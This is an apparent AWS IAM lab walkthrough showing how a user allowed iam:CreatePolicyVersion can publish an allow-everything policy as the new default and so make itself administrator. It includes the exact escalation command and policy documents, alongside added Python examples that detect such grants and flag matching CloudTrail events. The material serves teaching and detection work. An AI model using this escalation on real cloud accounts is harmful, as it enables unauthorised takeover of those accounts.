Introduction
A user with a small set of IAM permissions can grant themselves more than they were given by abusing IAM features such as create-policy-version with set-as-default. The user rewrites a policy that is attached to their own identity, and the new default version takes effect immediately.
References:
- AWS IAM privilege escalation
- Exploiting create-policy-version
Create an IAM User
Create an IAM user (no AWS console access):
aws iam create-user --user-name cli-iam-demo
Create an access key and note the credentials returned:
aws iam create-access-key --user-name cli-iam-demo
Then configure an AWS CLI profile with those credentials:
aws configure
Create User Console Access
This step is optional.
aws iam create-login-profile --generate-cli-skeleton > test.json
Fill in the user name and password in the template test.json, then run:
aws iam create-login-profile --cli-input-json file://test.json
Apply a Policy to the User
This policy allows the user to create new versions of any customer managed policy in the account. Save it as policy.json:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "PrivEsc1",
      "Effect": "Allow",
      "Action": "iam:CreatePolicyVersion",
      "Resource": "arn:aws:iam::*:policy/*"
    }
  ]
}
Create the policy and note the policy ARN in the output (used below as $POLICY_ARN):
aws iam create-policy --policy-name AllowCreatePolicyVersion --policy-document file://policy.json
Attach it to the user:
aws iam attach-user-policy --user-name cli-iam-demo --policy-arn $POLICY_ARN
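The dangerous property of the policy above is not iam:CreatePolicyVersion by itself but the combination of that action with a Resource pattern that covers a policy attached to the same principal. The following checker, an added example that is not part of the original page, evaluates a policy document against the list of managed policies attached to the principal and reports any Allow statement that lets the principal rewrite its own permissions. The policy names, the account id 123456789012 and the attached-policy ARNs are constructed placeholders; the SCOPED_POLICY document is an assumed safer alternative that limits the grant to one named policy the principal is not attached to.

```python
import fnmatch

# Constructed sample documents (placeholder ARNs, not a real account).
# BROAD_POLICY is the grant from the walkthrough; SCOPED_POLICY is an assumed
# alternative that only allows versioning one specific, unrelated policy.
BROAD_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "PrivEsc1",
        "Effect": "Allow",
        "Action": "iam:CreatePolicyVersion",
        "Resource": "arn:aws:iam::*:policy/*",
    }],
}

SCOPED_POLICY = {
    "Version": "2012-10-17",
    "Statement": [{
        "Sid": "ScopedVersioning",
        "Effect": "Allow",
        "Action": ["iam:CreatePolicyVersion", "iam:DeletePolicyVersion"],
        "Resource": "arn:aws:iam::123456789012:policy/app-team-s3-readonly",
    }],
}

# Actions that change which policy version is in force.
RISKY_ACTIONS = ("iam:CreatePolicyVersion", "iam:SetDefaultPolicyVersion")


def _as_list(value):
    """IAM allows a string or a list in Action/Resource; normalise to a list."""
    return value if isinstance(value, list) else [value]


def find_risky_grants(policy: dict, attached_policy_arns: list) -> list:
    """Return Allow statements that let the principal rewrite a policy attached to it.

    A finding is raised when a statement covers one of RISKY_ACTIONS (directly or
    through a wildcard such as iam:* or *) and its Resource pattern matches at
    least one ARN in attached_policy_arns. Action names are matched
    case-insensitively, as IAM does; ARNs are matched case-sensitively.
    Deny statements and NotAction/NotResource are deliberately not evaluated:
    those need the full IAM policy evaluation logic.
    """
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or "Action" not in stmt:
            continue
        actions = _as_list(stmt["Action"])
        resources = _as_list(stmt.get("Resource", []))
        hit_actions = [
            a for a in RISKY_ACTIONS
            if any(fnmatch.fnmatchcase(a.lower(), p.lower()) for p in actions)
        ]
        if not hit_actions:
            continue
        reachable = [
            arn for arn in attached_policy_arns
            if any(fnmatch.fnmatchcase(arn, r) for r in resources)
        ]
        if reachable:
            findings.append({
                "sid": stmt.get("Sid"),
                "actions": hit_actions,
                "policies": reachable,
            })
    return findings


if __name__ == "__main__":
    # The broad policy is attached to the user under this (placeholder) ARN.
    own_arn = "arn:aws:iam::123456789012:policy/AllowCreatePolicyVersion"
    print("broad :", find_risky_grants(BROAD_POLICY, [own_arn]))
    print("scoped:", find_risky_grants(
        SCOPED_POLICY, ["arn:aws:iam::123456789012:policy/ScopedVersioning"]))
```

The scoped document only stays safe as long as the policy it names is not also attached to the principal (directly, through a group, or through an assumable role), so the check must be run with the complete set of effective attachments, not just the direct ones.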
Privilege Escalation
The bad user writes an administrator policy document and saves it as admin_policy.json:
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "AllowEverything",
      "Effect": "Allow",
      "Action": "*",
      "Resource": "*"
    }
  ]
}
Now the user upgrades their own permissions to administrator by publishing this document as the new default version of the policy attached to them:
aws iam create-policy-version --policy-arn $POLICY_ARN --policy-document file://admin_policy.json --set-as-default
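Every call above is recorded by CloudTrail as an iam.amazonaws.com CreatePolicyVersion event whose requestParameters carry the target policyArn, the setAsDefault flag and the new policyDocument as a JSON string. The rule below, an added example that is not part of the original page, scans such records and alerts when the caller modified a policy attached to its own identity, or when a new default version grants * on *. The records and the attachment lookup are constructed samples with placeholder account ids and ARNs; in production the attachment map would be built from the IAM API or an inventory tool and must include policies inherited through groups and roles.

```python
import json

# Constructed CloudTrail records, trimmed to the fields the rule needs.
# Account id, ARNs and timestamps are placeholders, not real data.
SAMPLE_EVENTS = [
    {   # the escalation from the walkthrough
        "eventTime": "2024-01-01T10:00:00Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreatePolicyVersion",
        "userIdentity": {"type": "IAMUser", "userName": "cli-iam-demo",
                         "arn": "arn:aws:iam::123456789012:user/cli-iam-demo"},
        "requestParameters": {
            "policyArn": "arn:aws:iam::123456789012:policy/AllowCreatePolicyVersion",
            "setAsDefault": True,
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
                {"Sid": "AllowEverything", "Effect": "Allow",
                 "Action": "*", "Resource": "*"}]}),
        },
    },
    {   # a routine version update by an administrator to an unrelated policy
        "eventTime": "2024-01-01T11:00:00Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreatePolicyVersion",
        "userIdentity": {"type": "IAMUser", "userName": "platform-admin",
                         "arn": "arn:aws:iam::123456789012:user/platform-admin"},
        "requestParameters": {
            "policyArn": "arn:aws:iam::123456789012:policy/app-team-s3-readonly",
            "setAsDefault": True,
            "policyDocument": json.dumps({"Version": "2012-10-17", "Statement": [
                {"Effect": "Allow", "Action": "s3:GetObject",
                 "Resource": "arn:aws:s3:::app-bucket/*"}]}),
        },
    },
    {   # noise: a read-only call that the rule must ignore
        "eventTime": "2024-01-01T12:00:00Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "ListUsers",
        "userIdentity": {"type": "IAMUser", "userName": "platform-admin",
                         "arn": "arn:aws:iam::123456789012:user/platform-admin"},
        "requestParameters": None,
    },
]

# Constructed snapshot of managed policies attached to each principal.
ATTACHED = {
    "arn:aws:iam::123456789012:user/cli-iam-demo": {
        "arn:aws:iam::123456789012:policy/AllowCreatePolicyVersion"},
    "arn:aws:iam::123456789012:user/platform-admin": {
        "arn:aws:iam::123456789012:policy/platform-admin-policy"},
}


def _as_list(value):
    return value if isinstance(value, list) else [value]


def grants_everything(document_json: str) -> bool:
    """True if the document has an Allow statement for Action * on Resource *."""
    doc = json.loads(document_json)
    for stmt in _as_list(doc.get("Statement", [])):
        if stmt.get("Effect") != "Allow":
            continue
        if "*" in _as_list(stmt.get("Action", [])) and \
           "*" in _as_list(stmt.get("Resource", [])):
            return True
    return False


def detect_self_escalation(events: list, attached: dict) -> list:
    """Return alerts for CreatePolicyVersion calls that look like self-escalation."""
    alerts = []
    for ev in events:
        if ev.get("eventSource") != "iam.amazonaws.com" or \
           ev.get("eventName") != "CreatePolicyVersion":
            continue
        params = ev.get("requestParameters") or {}
        actor = (ev.get("userIdentity") or {}).get("arn")
        target = params.get("policyArn")
        reasons = []
        if target in attached.get(actor, set()):
            reasons.append("actor modified a policy attached to itself")
        if params.get("setAsDefault") and \
           grants_everything(params.get("policyDocument", "{}")):
            reasons.append("new default version grants * on *")
        if reasons:
            alerts.append({"time": ev.get("eventTime"), "actor": actor,
                           "policy": target, "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in detect_self_escalation(SAMPLE_EVENTS, ATTACHED):
        print(json.dumps(alert, indent=2))
```

The first condition is the higher-fidelity signal: an identity that rewrites a policy governing itself is almost never legitimate, regardless of what the new document contains. The second condition catches the same technique when the attachment map is stale or incomplete, at the cost of also firing on deliberate administrator policy changes, which should be rare enough to review by hand.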
Helper
This prints a JSON template of the input parameters for a command so you know what to provide:
aws iam create-policy --generate-cli-skeleton